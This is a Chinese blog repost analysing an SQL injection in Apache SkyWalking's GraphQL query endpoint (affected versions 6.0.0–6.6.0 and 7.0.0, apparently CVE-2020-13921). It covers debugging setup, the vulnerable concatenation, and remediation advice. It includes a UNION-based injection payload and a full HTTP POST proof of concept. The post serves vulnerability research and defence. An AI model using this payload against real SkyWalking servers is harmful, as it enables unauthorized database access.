skywalking远程调试Apache SkyWalking SQL注入

转载自博客:https://blog.csdn.net/caiqiiqi/article/details/107857173

参考:

  • https://www.openwall.com/lists/oss-security/2020/06/15/1
  • https://mp.weixin.qq.com/s/91MWSDYkom2Z8EVYSY37Qw
  • http://www.h2database.com/html/functions.html#h2version
  • https://s.tencent.com/research/bsafe/1011.html
  • https://blog.csdn.net/smooth00/article/details/96479544

编译好的6.5.0版本:

wget https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gz
cd apache-skywalking-apm-bin/bin
vi oapService.sh
  • 1
  • 2
  • 3

加上调试参数:

DEBUG_OPTIONS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=12346"
  • 1

然后启动:

./startup.sh
  • 1

在这里插入图片描述
发现已经在监听12346端口了。

下载6.5.0源码 (https://www.apache.org/dyn/closer.cgi/skywalking/6.5.0/apache-skywalking -apm-6.5.0-src.tgz)

导入IDEA,添加Remote Configuration,并设置module classpath为oap-server。

漏洞描述:

When use H2/MySQL/TiDB as Apache SkyWalking storage, the
metadata query through GraphQL protocol, there is a SQL injection
vulnerability,
which allows to access unpexcted data. Apache SkyWalking
6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don’t use the
appropriate way to set SQL parameters.

影响版本:
6.0.0-6.6.0, 7.0.0

我改成tcp形式才成功,默认的h2是内存型的,没找到表,导致失败了。 编辑application.yml

在这里插入图片描述

在这里插入图片描述

通过调试可以发现对id参数进行了拼接:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kj4Fajf2-1599014338834)(http://10.255.247.160:8080/image/20200807/1596793459001.jpg)]

于是对id参数构造payload:

id: \"') UNION SELECT 1,CONCAT('~', H2VERSION(), '~')--\"
  • 1

由于where查询语句已经结束,可以使用union注入,最后使用--注释掉后面的内容。
在这里插入图片描述

Demo:
在这里插入图片描述

调用栈:

executeQuery:106, JDBCHikariCPClient (org.apache.skywalking.oap.server.library.client.jdbc.hikaricp)
getLinearIntValues:117, H2MetricsQueryDAO (org.apache.skywalking.oap.server.storage.plugin.jdbc.h2.dao)
getLinearIntValues:96, MetricQueryService (org.apache.skywalking.oap.server.core.query)
getLinearIntValues:60, MetricQuery (org.apache.skywalking.oap.query.graphql.resolver)
invoke:-1, MetricQueryMethodAccess (org.apache.skywalking.oap.query.graphql.resolver)
get:147, MethodFieldResolverDataFetcher (com.coxautodev.graphql.tools)
fetchField:227, ExecutionStrategy (graphql.execution)
resolveField:170, ExecutionStrategy (graphql.execution)
execute:59, AsyncExecutionStrategy (graphql.execution)
executeOperation:158, Execution (graphql.execution)
execute:100, Execution (graphql.execution)
execute:558, GraphQL (graphql)
parseValidateAndExecute:500, GraphQL (graphql)
executeAsync:470, GraphQL (graphql)
execute:401, GraphQL (graphql)
execute:87, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:81, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:54, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:707, HttpServlet (javax.servlet.http)
service:101, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:790, HttpServlet (javax.servlet.http)
service:105, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
handle:841, ServletHolder (org.eclipse.jetty.servlet)
doHandle:543, ServletHandler (org.eclipse.jetty.servlet)
nextHandle:188, ScopedHandler (org.eclipse.jetty.server.handler)
doHandle:1239, ContextHandler (org.eclipse.jetty.server.handler)
nextScope:168, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:481, ServletHandler (org.eclipse.jetty.servlet)
nextScope:166, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:1141, ContextHandler (org.eclipse.jetty.server.handler)
handle:141, ScopedHandler (org.eclipse.jetty.server.handler)
handle:132, HandlerWrapper (org.eclipse.jetty.server.handler)
handle:564, Server (org.eclipse.jetty.server)
handle:320, HttpChannel (org.eclipse.jetty.server)
onFillable:251, HttpConnection (org.eclipse.jetty.server)
succeeded:279, AbstractConnection$ReadCallback (org.eclipse.jetty.io)
fillable:110, FillInterest (org.eclipse.jetty.io)
run:124, ChannelEndPoint$2 (org.eclipse.jetty.io)
runJob:672, QueuedThreadPool (org.eclipse.jetty.util.thread)
run:590, QueuedThreadPool$2 (org.eclipse.jetty.util.thread)
run:748, Thread (java.lang)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41

poc:

POST /graphql HTTP/1.1
Host: cqq.com:8080
Content-Type: application/json;charset=utf-8
Content-Length: 313
Connection: close

{"query":"query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: \"all_p99\", id: \"') UNION ALL SELECT NULL,CONCAT('~', H2VERSION(), '~')--\" }, duration: $duration) {  values { value } }}","variables":{"duration":{"start":"2020-08-07 1417","end":"2020-08-07 1418","step":"MINUTE"}}}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

修复建议:
升级Apache SkyWalking至8.0版,升级链接:https://github.com/apache/skywalking/releases

如暂时无法升级,作为缓解措施,建议不要将Apache SkyWalking的GraphQL接口暴露在外网,或在GraphQL接口之上增加一层认证。

CVE-2020-13921

Only when using H2/MySQL/TiDB as Apache
SkyWalking storage, there is a SQL injection vulnerability in the wildcard
query cases.

参考:
https://lists.apache.org/thread.html/r6f3a934ebc54585d8468151a494c1919dc1ee2cccaf237ec434dbbd6@%3Cdev.skywalking.apache.org%3E

posted on 2020-12-08 16:20  luzhouxiaoshuai  阅读(957)  评论(0编辑  收藏  举报

导航